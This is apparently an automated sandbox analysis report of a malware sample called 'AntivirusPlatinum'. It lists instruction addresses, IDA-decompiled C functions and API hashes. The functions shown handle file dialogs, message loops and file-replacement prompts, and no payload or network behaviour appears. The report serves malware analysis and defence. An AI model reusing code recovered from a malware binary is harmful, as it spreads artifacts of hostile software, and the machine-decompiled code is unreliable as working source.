                                                                                                                                                              0x0040c749
                                                                                                                                                              0x0040c74b
                                                                                                                                                              0x0040c752
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c764
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c771
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c77d
                                                                                                                                                              0x0040c77d
                                                                                                                                                              0x0040c781
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c787
                                                                                                                                                              0x0040c787
                                                                                                                                                              0x0040c5a9
                                                                                                                                                              0x0040c5af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c792
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c798
                                                                                                                                                              0x0040c798
                                                                                                                                                              0x0040c7a0
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a8
                                                                                                                                                              0x0040c7cd
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7c4
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7bb
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7db
                                                                                                                                                              0x0040c7e2
                                                                                                                                                              0x0040c7e9
                                                                                                                                                              0x0040c7f0
                                                                                                                                                              0x0040c7f5
                                                                                                                                                              0x0040c7fc
                                                                                                                                                              0x0040c83d
                                                                                                                                                              0x0040c846
                                                                                                                                                              0x0040c84b
                                                                                                                                                              0x0040c84d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c84f
                                                                                                                                                              0x0040c84f
                                                                                                                                                              0x0040c851
                                                                                                                                                              0x0040c858
                                                                                                                                                              0x0040c85e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c862
                                                                                                                                                              0x0040c865
                                                                                                                                                              0x0040c86c
                                                                                                                                                              0x0040c86e
                                                                                                                                                              0x0040c875
                                                                                                                                                              0x0040c878
                                                                                                                                                              0x0040c87d
                                                                                                                                                              0x0040c87f
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x0040c881
                                                                                                                                                              0x0040c881
                                                                                                                                                              0x0040c883
                                                                                                                                                              0x0040c886
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c8a0
                                                                                                                                                              0x0040c8a1
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a8
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c88b
                                                                                                                                                              0x0040c88c
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x0040c867
                                                                                                                                                              0x0040c867
                                                                                                                                                              0x0040c86a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b9
                                                                                                                                                              0x0040c8bb
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c7fe
                                                                                                                                                              0x0040c7fe
                                                                                                                                                              0x0040c805
                                                                                                                                                              0x0040c813
                                                                                                                                                              0x0040c81a
                                                                                                                                                              0x0040c81f
                                                                                                                                                              0x0040c821
                                                                                                                                                              0x0040c827
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c7
                                                                                                                                                              0x0040c8d0
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8e3
                                                                                                                                                              0x0040c8f2
                                                                                                                                                              0x0040c8f9
                                                                                                                                                              0x0040c905
                                                                                                                                                              0x0040c90a
                                                                                                                                                              0x0040c911
                                                                                                                                                              0x0040c91a
                                                                                                                                                              0x0040c926
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c939
                                                                                                                                                              0x0040c940
                                                                                                                                                              0x0040c945
                                                                                                                                                              0x0040c94c
                                                                                                                                                              0x0040c952
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c968
                                                                                                                                                              0x0040c96d
                                                                                                                                                              0x0040c974
                                                                                                                                                              0x0040c979
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x0040c98c
                                                                                                                                                              0x0040c998
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c97d
                                                                                                                                                              0x0040c97d
                                                                                                                                                              0x0040c983
                                                                                                                                                              0x0040c988
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c99d
                                                                                                                                                              0x0040c9a8
                                                                                                                                                              0x0040c9b4
                                                                                                                                                              0x0040c9b6
                                                                                                                                                              0x0040c9b8
                                                                                                                                                              0x0040c9c1
                                                                                                                                                              0x0040c9c8
                                                                                                                                                              0x0040c9ca
                                                                                                                                                              0x0040c9cc
                                                                                                                                                              0x0040c9d5
                                                                                                                                                              0x0040c9dc
                                                                                                                                                              0x0040c9de
                                                                                                                                                              0x0040c9e0
                                                                                                                                                              0x0040c9e9
                                                                                                                                                              0x0040c9f7
                                                                                                                                                              0x0040c9fc
                                                                                                                                                              0x0040ca03
                                                                                                                                                              0x0040ca07
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca1d
                                                                                                                                                              0x0040ca1d
                                                                                                                                                              0x0040ca21
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c55b
                                                                                                                                                              0x0040c55b
                                                                                                                                                              0x0040c563
                                                                                                                                                              0x0040c568
                                                                                                                                                              0x0040c56b
                                                                                                                                                              0x0040c591
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x0040c585
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c008
                                                                                                                                                              0x0040c00c
                                                                                                                                                              0x0040c011
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c01b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040c01b
                                                                                                                                                              0x0040ca58
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x0040c63b
                                                                                                                                                              0x0040c642
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c648
                                                                                                                                                              0x0040c64a
                                                                                                                                                              0x0040c651
                                                                                                                                                              0x0040c658
                                                                                                                                                              0x0040c65f
                                                                                                                                                              0x0040c69f
                                                                                                                                                              0x0040c6a6
                                                                                                                                                              0x0040c6af
                                                                                                                                                              0x0040c6bb
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6d5
                                                                                                                                                              0x0040c6e3
                                                                                                                                                              0x0040c6ed
                                                                                                                                                              0x0040c6f4
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c703
                                                                                                                                                              0x0040c703
                                                                                                                                                              0x0040c705
                                                                                                                                                              0x0040c70a
                                                                                                                                                              0x0040c711
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x0040c661
                                                                                                                                                              0x0040c661
                                                                                                                                                              0x0040c66a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c674
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c676
                                                                                                                                                              0x0040c676
                                                                                                                                                              0x0040c67f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c681
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c681
                                                                                                                                                              0x0040c683
                                                                                                                                                              0x0040c68b
                                                                                                                                                              0x0040c692
                                                                                                                                                              0x0040c697
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c71c
                                                                                                                                                              0x0040c720
                                                                                                                                                              0x0040c72d
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c720

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DialogItemMessagePathTempText
                                                                                                                                                              • String ID: %s%s%d$@
                                                                                                                                                              • API String ID: 2494799851-3206671281
                                                                                                                                                              • Opcode ID: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                              • Instruction ID: 60ff87052d5ec9c8cb07c29fa8386008fa4b4f1150e87128aeb403cb9a6e3690
                                                                                                                                                              • Opcode Fuzzy Hash: b60175ef51fccfefb6d42f0a9252ebfaf611be2a1e8d9d8e576f50eb8e4d0200
                                                                                                                                                              • Instruction Fuzzy Hash: CE416D7190525CEEEB21EBA0CD88FDA77ACAB04304F0085B6E509E2190D7B99B89CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00402854(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				CHAR* _v36;
                                                                                                                                                              				long _v48;
                                                                                                                                                              				char* _v52;
                                                                                                                                                              				char* _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				char _v592;
                                                                                                                                                              				char _v1616;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                              				signed int _t48;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				char _t66;
                                                                                                                                                              				char* _t67;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				signed int _t76;
                                                                                                                                                              
                                                                                                                                                              				_t64 =  &_v592;
                                                                                                                                                              				if(_a16 != 0) {
                                                                                                                                                              					E0040A477( &_v592, _a16);
                                                                                                                                                              					_t68 = _t69 + E0040A384(_t61,  &_v592) - 0x24b;
                                                                                                                                                              					E0040A477(_t68, _a16);
                                                                                                                                                              					_t64 = _t68 + E0040A384(_t61, _t68) + 1;
                                                                                                                                                              				}
                                                                                                                                                              				E0040A477(_t64, E004098F7(0x85));
                                                                                                                                                              				_t65 = _t64 + E0040A384(_t61, _t64) + 1;
                                                                                                                                                              				E0040A477(_t65, 0x4122d4);
                                                                                                                                                              				_t39 = E0040A384(_t61, _t65);
                                                                                                                                                              				 *((char*)(_t39 + _t65 + 1)) = 0;
                                                                                                                                                              				_t66 = 0x4c;
                                                                                                                                                              				E0040A289(_t61,  &_v80, 0, _t66);
                                                                                                                                                              				_v76 = _a4;
                                                                                                                                                              				_t43 =  *0x414c78; // 0x400000
                                                                                                                                                              				_v72 = _t43;
                                                                                                                                                              				_v80 = _t66;
                                                                                                                                                              				_t67 = _a12;
                                                                                                                                                              				_v68 =  &_v592;
                                                                                                                                                              				_v52 = _t67;
                                                                                                                                                              				_v48 = 0x400;
                                                                                                                                                              				_v32 = _a8;
                                                                                                                                                              				if(E004073DB(_t67) == _t67) {
                                                                                                                                                              					GetCurrentDirectoryA(0x400,  &_v1616);
                                                                                                                                                              					_v36 =  &_v1616;
                                                                                                                                                              				}
                                                                                                                                                              				_v28 = 0x1080c;
                                                                                                                                                              				_push( &_v80);
                                                                                                                                                              				if(_a20 == 0) {
                                                                                                                                                              					_t48 = GetOpenFileNameA();
                                                                                                                                                              				} else {
                                                                                                                                                              					_t48 = GetSaveFileNameA();
                                                                                                                                                              				}
                                                                                                                                                              				_t63 = _t48;
                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                              					_t48 = CommDlgExtendedError();
                                                                                                                                                              					if(_t48 == 0x3002) {
                                                                                                                                                              						 *_t67 = 0;
                                                                                                                                                              						_push( &_v80);
                                                                                                                                                              						if(_a20 == 0) {
                                                                                                                                                              							_t48 = GetOpenFileNameA();
                                                                                                                                                              						} else {
                                                                                                                                                              							_t48 = GetSaveFileNameA();
                                                                                                                                                              						}
                                                                                                                                                              						_t63 = _t48;
                                                                                                                                                              					}
                                                                                                                                                              					_t76 = _t63;
                                                                                                                                                              				}
                                                                                                                                                              				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                              			}

























                                                                                                                                                              0x00402864
                                                                                                                                                              0x0040286a
                                                                                                                                                              0x00402872
                                                                                                                                                              0x00402882
                                                                                                                                                              0x0040288a
                                                                                                                                                              0x00402895
                                                                                                                                                              0x00402895
                                                                                                                                                              0x004028a5
                                                                                                                                                              0x004028b0
                                                                                                                                                              0x004028ba
                                                                                                                                                              0x004028c0
                                                                                                                                                              0x004028c7
                                                                                                                                                              0x004028cc
                                                                                                                                                              0x004028d4
                                                                                                                                                              0x004028dc
                                                                                                                                                              0x004028df
                                                                                                                                                              0x004028e4
                                                                                                                                                              0x004028ed
                                                                                                                                                              0x004028f0
                                                                                                                                                              0x004028f3
                                                                                                                                                              0x004028ff
                                                                                                                                                              0x00402902
                                                                                                                                                              0x00402905
                                                                                                                                                              0x0040290f
                                                                                                                                                              0x00402919
                                                                                                                                                              0x00402925
                                                                                                                                                              0x00402925
                                                                                                                                                              0x00402935
                                                                                                                                                              0x0040293c
                                                                                                                                                              0x0040293d
                                                                                                                                                              0x00402947
                                                                                                                                                              0x0040293f
                                                                                                                                                              0x0040293f
                                                                                                                                                              0x0040293f
                                                                                                                                                              0x00402949
                                                                                                                                                              0x0040294d
                                                                                                                                                              0x0040294f
                                                                                                                                                              0x0040295a
                                                                                                                                                              0x00402963
                                                                                                                                                              0x00402966
                                                                                                                                                              0x00402967
                                                                                                                                                              0x00402971
                                                                                                                                                              0x00402969
                                                                                                                                                              0x00402969
                                                                                                                                                              0x00402969
                                                                                                                                                              0x00402973
                                                                                                                                                              0x00402973
                                                                                                                                                              0x00402975
                                                                                                                                                              0x00402975
                                                                                                                                                              0x0040297e

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402919
                                                                                                                                                              • GetSaveFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 0040293F
                                                                                                                                                              • GetOpenFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122D4,?,?,00000000,00000085,?,?), ref: 00402947
                                                                                                                                                              • CommDlgExtendedError.COMDLG32 ref: 0040294F
                                                                                                                                                              • GetSaveFileNameA.COMDLG32(?), ref: 00402969
                                                                                                                                                              • GetOpenFileNameA.COMDLG32(?), ref: 00402971
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileName$OpenSave$CommCurrentDirectoryErrorExtended
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1809602070-0
                                                                                                                                                              • Opcode ID: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                              • Instruction ID: ff30afd232e3d8f3ba4cc359dfcf402cea8e18d8be24ab53ae8b2113f52266a8
                                                                                                                                                              • Opcode Fuzzy Hash: 6245d7889aa86965bb41dfc6eb2fa2d3cf87c008a1edef2314fa0fcf31d269f6
                                                                                                                                                              • Instruction Fuzzy Hash: 8F31B3B59012199BCB11EFA5C949FDE7BB8AF04314F104026FD44F3281C7789955CBAA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E004064FD(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				struct tagMSG _v44;
                                                                                                                                                              				long _t24;
                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                              				intOrPtr* _t32;
                                                                                                                                                              				intOrPtr* _t34;
                                                                                                                                                              				intOrPtr* _t36;
                                                                                                                                                              				struct HWND__* _t46;
                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                              
                                                                                                                                                              				_t46 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t24 = GetTickCount();
                                                                                                                                                              				_t53 = _a4;
                                                                                                                                                              				_v16 = _t24;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_push( &_v12);
                                                                                                                                                              					_push(_t53);
                                                                                                                                                              					if( *((intOrPtr*)( *_t53 + 0x48))() >= 0 && _v12 != _t46) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					if(GetTickCount() - _v16 > 0x2710) {
                                                                                                                                                              						break;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(PeekMessageA( &_v44, _t46, _t46, _t46, _t46) != 0) {
                                                                                                                                                              							GetMessageA( &_v44, _t46, _t46, _t46);
                                                                                                                                                              							TranslateMessage( &_v44);
                                                                                                                                                              							DispatchMessageA( &_v44);
                                                                                                                                                              						}
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t29 = _v12;
                                                                                                                                                              				if(_t29 != _t46) {
                                                                                                                                                              					_push( &_v8);
                                                                                                                                                              					_push(0x41282c);
                                                                                                                                                              					_push(_t29);
                                                                                                                                                              					if( *((intOrPtr*)( *_t29))() >= 0) {
                                                                                                                                                              						_t32 = _v8;
                                                                                                                                                              						_push(_t32);
                                                                                                                                                              						if( *((intOrPtr*)( *_t32 + 0x20))() >= 0) {
                                                                                                                                                              							_t36 = _v8;
                                                                                                                                                              							_t46 = _t46 & 0xffffff00 |  *((intOrPtr*)( *_t36 + 0x14))(_t36, _a8) >= 0x00000000;
                                                                                                                                                              						}
                                                                                                                                                              						_t34 = _v8;
                                                                                                                                                              						 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t46;
                                                                                                                                                              			}














                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406516
                                                                                                                                                              0x00406519
                                                                                                                                                              0x0040651c
                                                                                                                                                              0x00406521
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406528
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406539
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x00406554
                                                                                                                                                              0x0040655e
                                                                                                                                                              0x00406568
                                                                                                                                                              0x00406568
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x00406539
                                                                                                                                                              0x00406570
                                                                                                                                                              0x00406575
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x0040657d
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406587
                                                                                                                                                              0x00406589
                                                                                                                                                              0x0040658e
                                                                                                                                                              0x00406594
                                                                                                                                                              0x00406596
                                                                                                                                                              0x004065a4
                                                                                                                                                              0x004065a4
                                                                                                                                                              0x004065a7
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x00406587
                                                                                                                                                              0x004065b6

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00406514
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040652F
                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00406543
                                                                                                                                                              • GetMessageA.USER32 ref: 00406554
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0040655E
                                                                                                                                                              • DispatchMessageA.USER32 ref: 00406568
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CountTick$DispatchPeekTranslate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906477200-0
                                                                                                                                                              • Opcode ID: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                              • Instruction ID: 4ec5337514138466832f045ad94f732bf95921bc87828c57aa0924f33fa4e90b
                                                                                                                                                              • Opcode Fuzzy Hash: de4563fddac7f047d422ea89b0fca390a86d69ec7808a870bafdc2c2368130f6
                                                                                                                                                              • Instruction Fuzzy Hash: 1821E4B1A00109AFDB00DFA5DD88DDEBBBCEE48305B1444AAE502E7294D778DA51CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040BB8A(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                              				int _t14;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				char* _t19;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				char* _t23;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				char* _t26;
                                                                                                                                                              
                                                                                                                                                              				while(1) {
                                                                                                                                                              					 *0x419ee0 = _a12;
                                                                                                                                                              					 *0x419ee4 = _a16;
                                                                                                                                                              					 *0x419ed8 = _a20;
                                                                                                                                                              					if( *0x419ede == 0) {
                                                                                                                                                              						if( *0x419edf == 0) {
                                                                                                                                                              							_t14 = DialogBoxParamA( *0x414c74, "REPLACEFILEDLG",  *0x419f80, E0040AE97, _a8);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t14 = 2;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t14 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					_t15 = _t14 - 1;
                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t18 = _t15 - 1;
                                                                                                                                                              					if(_t18 == 0) {
                                                                                                                                                              						L15:
                                                                                                                                                              						_t19 = _a4;
                                                                                                                                                              						 *_t19 = 0x4e;
                                                                                                                                                              						return _t19;
                                                                                                                                                              					}
                                                                                                                                                              					_t20 = _t18 - 1;
                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                              						 *0x419ede = 1;
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t21 = _t20 - 1;
                                                                                                                                                              					if(_t21 != 0) {
                                                                                                                                                              						_t22 = _t21 - 1;
                                                                                                                                                              						if(_t22 == 0) {
                                                                                                                                                              							_t23 = _a4;
                                                                                                                                                              							 *0x419f78 = 1;
                                                                                                                                                              							 *_t23 = 0x43;
                                                                                                                                                              							return _t23;
                                                                                                                                                              						}
                                                                                                                                                              						_t24 = _t22 - 1;
                                                                                                                                                              						if(_t24 != 0) {
                                                                                                                                                              							return _t24;
                                                                                                                                                              						}
                                                                                                                                                              						 *0x419edf = 1;
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					if(DialogBoxParamA( *0x414c74, "RENAMEDLG",  *0x419f80, E0040B193, _a8) == 0) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					_t26 = _a4;
                                                                                                                                                              					 *_t26 = 0x52;
                                                                                                                                                              					return _t26;
                                                                                                                                                              				}
                                                                                                                                                              				 *_a4 = 0x59;
                                                                                                                                                              				return SetFileAttributesA(_a8, 0);
                                                                                                                                                              			}













                                                                                                                                                              0x0040bb94
                                                                                                                                                              0x0040bb9e
                                                                                                                                                              0x0040bba6
                                                                                                                                                              0x0040bbae
                                                                                                                                                              0x0040bbb3
                                                                                                                                                              0x0040bbc1
                                                                                                                                                              0x0040bbe1
                                                                                                                                                              0x0040bbc3
                                                                                                                                                              0x0040bbc5
                                                                                                                                                              0x0040bbc5
                                                                                                                                                              0x0040bbb5
                                                                                                                                                              0x0040bbb7
                                                                                                                                                              0x0040bbb7
                                                                                                                                                              0x0040bbe3
                                                                                                                                                              0x0040bbe4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bbe6
                                                                                                                                                              0x0040bbe7
                                                                                                                                                              0x0040bc23
                                                                                                                                                              0x0040bc23
                                                                                                                                                              0x0040bc26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc26
                                                                                                                                                              0x0040bbe9
